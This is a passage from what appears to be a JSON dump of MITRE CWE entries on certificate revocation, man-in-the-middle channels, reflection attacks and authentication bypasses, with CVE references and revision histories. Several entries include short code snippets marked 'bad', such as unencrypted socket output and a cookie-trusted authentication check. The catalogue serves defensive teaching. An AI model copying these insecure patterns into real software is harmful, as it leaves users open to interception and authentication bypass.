a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0642"},{"Reference":"CVE-2008-4679","Description":"chain: web service component does not call the expected method, which prevents a check for revoked certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4679"},{"Reference":"CVE-2006-4410","Description":"Certificate revocation list not searched for certain certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4410"},{"Reference":"CVE-2006-4409","Description":"Product cannot access certificate revocation list when an HTTP proxy is being used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4409"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check for certificate revocation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check for Certificate Revocation","attr":{"@_Date":"2009-03-10"}}}},"300":{"attr":{"@_ID":"300","@_Name":"Channel Accessible by Non-Endpoint","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.","Extended_Description":"In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Adversary-in-the-Middle / AITM"},{"Term":"Man-in-the-Middle / MITM"},{"Term":"Person-in-the-Middle / PITM"},{"Term":"Monkey-in-the-Middle"},{"Term":"Monster-in-the-Middle"},{"Term":"On-path attack"},{"Term":"Interception attack"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker could pose as one of the entities and read or possibly modify the communication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always fully authenticate both ends of any communications channel."},{"Phase":"Architecture and Design","Description":"Adhere to the principle of complete mediation."},{"Phase":"Implementation","Description":"A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer\'s private key. The certificate can be validated by deciphering the certificate with the issuer\'s public key. See also X.509 certificate signature chains and the PGP certification structure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the Java snippet below, data is sent over an unencrypted channel to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Socket sock;PrintWriter out;try {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(REMOTE_HOST, REMOTE_PORT);out = new PrintWriter(echoSocket.getOutputStream(), true);...","xhtml:br":["","","",""],"xhtml:i":"// Write data to remote host via socket output stream."}}}},"Body_Text":"By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversry-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Man-in-the-middle (MITM)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"466"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"589"}},{"attr":{"@_CAPEC_ID":"590"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"615"}},{"attr":{"@_CAPEC_ID":"662"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-244"}}},"Notes":{"Note":{"#text":"The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Man-in-the-middle (MITM)","attr":{"@_Date":"2008-04-11"}},{"#text":"Channel Accessible by Non-Endpoint (aka \'Man-in-the-Middle\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Channel Accessible by Non-Endpoint (\'Man-in-the-Middle\')","attr":{"@_Date":"2020-02-24"}}]}},"301":{"attr":{"@_ID":"301","@_Name":"Reflection Attack in an Authentication Protocol","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user.","Extended_Description":{"xhtml:p":["A mutual authentication protocol requires each party to respond to a random challenge by the other party by encrypting it with a pre-shared key. Often, however, such protocols employ the same pre-shared key for communication with a number of different entities. A malicious user or an attacker can easily compromise this protocol without possessing the correct key by employing a reflection attack on the protocol.","Reflection attacks capitalize on mutual authentication schemes in order to trick the target into revealing the secret shared between it and another valid user. In a basic mutual-authentication scheme, a secret is known to both the valid user and the server; this allows them to authenticate. In order that they may verify this shared secret without sending it plainly over the wire, they utilize a Diffie-Hellman-style scheme in which they each pick a value, then request the hash of that value as keyed by the shared secret. In a reflection attack, the attacker claims to be a valid user and requests the hash of a random value from the server. When the server returns this value and requests its own value to be hashed, the attacker opens another connection to the server. This time, the hash requested by the attacker is the value which the server requested in the first connection. When the server returns this hashed value, it is used in the first connection, authenticating the attacker successfully as the impersonated valid user."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The primary result of reflection attacks is successful authentication with a target machine -- as an impersonated user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use different keys for the initiator and responder or of a different type of challenge for the initiator and responder."},{"Phase":"Architecture and Design","Description":"Let the initiator prove its identity before proceeding."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *simple_digest(char *alg,char *buf,unsigned int len, int *olen) {}unsigned char *generate_password_and_cmd(char *password_and_cmd) {}","xhtml:div":[{"#text":"const EVP_MD *m;EVP_MD_CTX ctx;unsigned char *ret;OpenSSL_add_all_digests();if (!(m = EVP_get_digestbyname(alg))) return NULL;if (!(ret = (unsigned char*)malloc(EVP_MAX_MD_SIZE))) return NULL;EVP_DigestInit(&amp;ctx, m);EVP_DigestUpdate(&amp;ctx,buf,len);EVP_DigestFinal(&amp;ctx,ret,olen);return ret;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","",""]},{"#text":"simple_digest(\\"sha1\\",password,strlen(password_and_cmd)...);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String command = new String(\\"some cmd to execute &amp; the password\\") MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(command.getBytes(\\"UTF-8\\"));byte[] digest = encer.digest();","xhtml:br":["",""]}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reflection attack in an auth protocol"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Insufficient Validation&#34;, Page 38"}}]},"Notes":{"Note":{"#text":"The term \\"reflection\\" is used in multiple ways within CWE and the community, so its usage should be reviewed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Other_Notes"}]}},"302":{"attr":{"@_ID":"302","@_Name":"Authentication Bypass by Assumed-Immutable Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"Implement proper protection for immutable data (e.g. environment variable, hidden form fields, etc.)"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an \\"authenticated\\" cookie is used to determine whether or not a user should be granted access to a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authenticated = new Boolean(getCookieValue(\\"authenticated\\")).booleanValue();if (authenticated) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0367","Description":"DebPloit","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0367"},{"Reference":"CVE-2004-0261","Description":"Web auth","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0261"},{"Reference":"CVE-2002-1730","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1730"},{"Reference":"CVE-2002-1734","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1734"},{"Reference":"CVE-2002-2064","Description":"Admin access by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2064"},{"Reference":"CVE-2002-2054","Description":"Gain privileges by setting cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2054"},{"Reference":"CVE-2004-1611","Description":"Product trusts authentication information in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611"},{"Reference":"CVE-2005-1708","Description":"Authentication bypass by setting admin-testing variable to true.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1708"},{"Reference":"CVE-2005-1787","Description":"Bypass auth and gain privileges by setting a variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass via Assumed-Immutable Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC02-J","Entry_Name":"Do not base security checks on untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"77"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"303":{"attr":{"@_ID":"303","@_Name":"Incorrect Implementation of Authentication Algorithm","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.","Extended_Description":"This incorrect implementation may allow authentication to be bypassed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0750","Description":"Conditional should have been an \'or\' not an \'and\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0750"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Logic Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Logic Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Improper Implementation of Authentication Algorithm","attr":{"@_Date":"2009-05-27"}}]}},"304":{"attr":{"@_ID":"304","@_Name":"Missing Critical Step in Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an authentication technique, but it skips a step that weakens the technique.","Extended_Description":"Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Application Data","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or allowing attackers to execute arbitrary code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Critical Step in Authentication"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"305":{"attr":{"@_ID":"305","@_Name":"Authentication Bypass by Primary Weakness","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1374","Description":"The provided password is only compared against the first character of the real 